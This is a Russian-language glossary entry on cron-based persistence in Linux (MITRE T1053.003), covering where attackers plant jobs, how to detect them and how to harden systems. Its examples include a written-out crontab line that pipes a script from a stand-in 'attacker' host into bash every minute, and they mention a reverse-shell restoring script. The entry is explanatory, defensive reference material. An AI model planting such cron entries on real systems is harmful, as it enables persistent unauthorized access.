Закрепление через cron
Что такое Закрепление через cron?
Закрепление через cronТехника закрепления в Linux/Unix, использующая cron, anacron или таймеры systemd для повторного запуска кода злоумышленника по расписанию или системному событию.
Закрепление через cron (MITRE ATT&CK T1053.003) направлено на демон cron Unix и его варианты (anacron, fcron, таймеры systemd). Злоумышленники добавляют записи в /etc/crontab, /etc/cron.d/, /etc/cron.{hourly,daily,weekly,monthly}/ или в пользовательские crontab (crontab -e). Типичные пейлоады — однострочные reverse shell, скачивание через curl и пайпы, скрипты в /tmp. Поскольку cron работает как root или владелец задачи, метод надёжен и легко разворачивается после первоначального доступа. Обнаружение: контроль целостности каталогов cron, правила auditd, базовая инвентаризация заданий и EDR-оповещения на оболочки, порождённые cron. Усиление: ограничение членства в crontab, монтирование /tmp с noexec, аудит systemd-cron, где доступно.
● Примеры
- 01
Запись * * * * * curl -s http://attacker/sh | bash в /etc/cron.d/update.
- 02
Скрипт в /etc/cron.hourly/, ежечасно восстанавливающий reverse shell.
● Частые вопросы
Что такое Закрепление через cron?
Техника закрепления в Linux/Unix, использующая cron, anacron или таймеры systemd для повторного запуска кода злоумышленника по расписанию или системному событию. Относится к категории Атаки и угрозы в кибербезопасности.
Что означает Закрепление через cron?
Техника закрепления в Linux/Unix, использующая cron, anacron или таймеры systemd для повторного запуска кода злоумышленника по расписанию или системному событию.
Как работает Закрепление через cron?
Закрепление через cron (MITRE ATT&CK T1053.003) направлено на демон cron Unix и его варианты (anacron, fcron, таймеры systemd). Злоумышленники добавляют записи в /etc/crontab, /etc/cron.d/, /etc/cron.{hourly,daily,weekly,monthly}/ или в пользовательские crontab (crontab -e). Типичные пейлоады — однострочные reverse shell, скачивание через curl и пайпы, скрипты в /tmp. Поскольку cron работает как root или владелец задачи, метод надёжен и легко разворачивается после первоначального доступа. Обнаружение: контроль целостности каталогов cron, правила auditd, базовая инвентаризация заданий и EDR-оповещения на оболочки, порождённые cron. Усиление: ограничение членства в crontab, монтирование /tmp с noexec, аудит systemd-cron, где доступно.
Как защититься от Закрепление через cron?
Защита от Закрепление через cron обычно сочетает технические меры и операционные практики, как описано в определении выше.
Какие есть другие названия Закрепление через cron?
Распространённые альтернативные названия: Закрепление через crontab, Закрепление через anacron.
● Связанные термины
- attacks№ 610
Перехват через LD_PRELOAD
Техника закрепления и подмены библиотек в Linux, использующая переменную LD_PRELOAD или /etc/ld.so.preload для внедрения кода в процессы с динамической компоновкой.
- attacks№ 608
Закрепление через launchd
Техника закрепления в macOS, размещающая plist LaunchDaemon или LaunchAgent, чтобы launchd запускал код злоумышленника при загрузке, входе или триггере.
- attacks№ 975
Закрепление через запланированные задания
Техника закрепления и исполнения, при которой злоумышленник создаёт или изменяет запланированное задание Windows для запуска пейлоада по триггеру (вход, загрузка, таймер).
- attacks№ 1246
Закрепление через подписку WMI
Техника закрепления, регистрирующая постоянный WMI-фильтр и потребитель события, чтобы код злоумышленника запускался при выбранном системном событии.
- attacks№ 914
Закрепление через раздел Run реестра
Классическая техника закрепления в Windows, добавляющая запись в раздел реестра Run или RunOnce для запуска бинарника или скрипта при каждом входе пользователя.